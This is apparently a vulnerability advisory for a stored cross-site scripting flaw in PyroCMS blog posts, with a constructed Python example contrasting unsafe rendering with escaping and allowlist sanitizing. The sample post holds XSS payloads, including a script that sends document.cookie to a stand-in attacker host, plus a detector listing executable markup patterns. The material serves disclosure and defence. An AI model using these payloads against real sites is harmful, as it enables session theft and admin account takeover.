CVE-2022-37721 - Stored Cross-Site Scripting in PyroCMS

1. Vulnerability Properties

Title: Stored Cross-Site Scripting in PyroCMS
CVE ID: CVE-2022-37721
CVSSv3 Base Score: 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)
Vendor: PyroCMS, Inc.
Products: PyroCMS
Advisory Release Date: 14 November 2022
Advisory URL: https://labs.integrity.pt/advisories/cve-2022-37721
Credits: Discovery by Bruno Barreirinhas <bb[at]integrity.pt>

2. Vulnerability Summary

PyroCMS is vulnerable to a stored cross-site scripting (XSS) flaw: a low-privileged user, such as an author, can inject a crafted HTML and JavaScript payload into the body of a blog post, and the payload is stored without being encoded for output.
The JavaScript executes whenever the affected blog post is loaded in a victim's browser. When the victim is an administrator, the script runs with the administrator's session, which allows full admin account takeover or privilege escalation.
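The rendering pattern behind this class of bug, and two ways to close it, as an added example. This is illustrative Python written for this page, not PyroCMS code (PyroCMS is a PHP application); the post body, the render functions, the tag allowlist and the detector below are all constructed for the demonstration and are not taken from the product.

```python
"""Stored XSS: unsafe vs. hardened rendering of author-supplied post content.

Added example, not PyroCMS code. The render functions, the allowlist, the
detector and the sample post body are constructed for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed sample of what a low-privileged author might submit as a post body.
MALICIOUS_POST = (
    '<p>Hello</p>'
    '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
    '<img src=x onerror="alert(document.domain)">'
    '<a href="javascript:alert(1)">click</a>'
)


def render_post_unsafe(body: str) -> str:
    """Vulnerable pattern: stored, author-controlled HTML interpolated verbatim.
    Whatever the author saved runs in every viewer's browser, an admin's included."""
    return f'<article class="post">{body}</article>'


def render_post_escaped(body: str) -> str:
    """Simplest fix when rich text is not needed: encode for an HTML text context,
    so the payload is displayed as text instead of parsed as markup."""
    return f'<article class="post">{html.escape(body, quote=True)}</article>'


# Allowlist for the common case where authors legitimately need some formatting.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "ul", "ol", "li", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document keeping only allowlisted tags and attributes.
    Unknown tags are dropped but their text is kept; <script>/<style> bodies are dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return
        safe_attrs = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue  # rejects javascript:, data:, vbscript: and friends
            safe_attrs.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:
            # Entities were decoded by the parser; re-encode so text stays text.
            self.out.append(html.escape(data, quote=True))


def sanitize_post(body: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


def render_post_sanitized(body: str) -> str:
    """Fix for rich-text posts: run stored markup through the allowlist on output."""
    return f'<article class="post">{sanitize_post(body)}</article>'


class ActiveContentDetector(HTMLParser):
    """Flags markup a browser would execute: <script>, on* handlers, and
    javascript:/data: URLs in href or src. Used here to check the renderers' output."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name in ("href", "src") and value and \
                    value.strip().lower().startswith(("javascript:", "data:")):
                self.findings.append(f"{tag}@{name}={value.split(':')[0]}")


def find_active_content(rendered: str) -> list:
    detector = ActiveContentDetector()
    detector.feed(rendered)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for name, fn in (("unsafe", render_post_unsafe),
                     ("escaped", render_post_escaped),
                     ("sanitized", render_post_sanitized)):
        out = fn(MALICIOUS_POST)
        print(f"{name:9} findings={find_active_content(out)} {out}")
```

Running the block shows the unsafe renderer passing the script tag, the `onerror` handler and the `javascript:` link straight through, while both the escaped and the allowlisted renderers leave nothing executable. The allowlist approach is the one to reach for when authors need formatting; it must be applied on output (or on every stored write path) so that content saved before the fix is covered too. Output encoding is the fix; session cookies flagged `HttpOnly` and a restrictive Content-Security-Policy limit the damage if a bypass is found, but neither removes the underlying flaw.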

3. Vulnerable Versions

  • < 3.9.1

4. Solution

* No official patch had been released by the vendor at the time this advisory was published.

5. Vulnerability Timeline

  • 2/Aug/22 - Bug reported to PyroCMS
  • 3/Aug/22 - Bug verified by vendor
  • 3/Aug/22 - Notified the vendor regarding the impact (no feedback)
  • 7/Sep/22 - Contacted the vendor requesting an update (no feedback)
  • 9/Nov/22 - Notified the vendor about the disclosure (no feedback)
  • 14/Nov/22 - Advisory Released

6. References

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37721

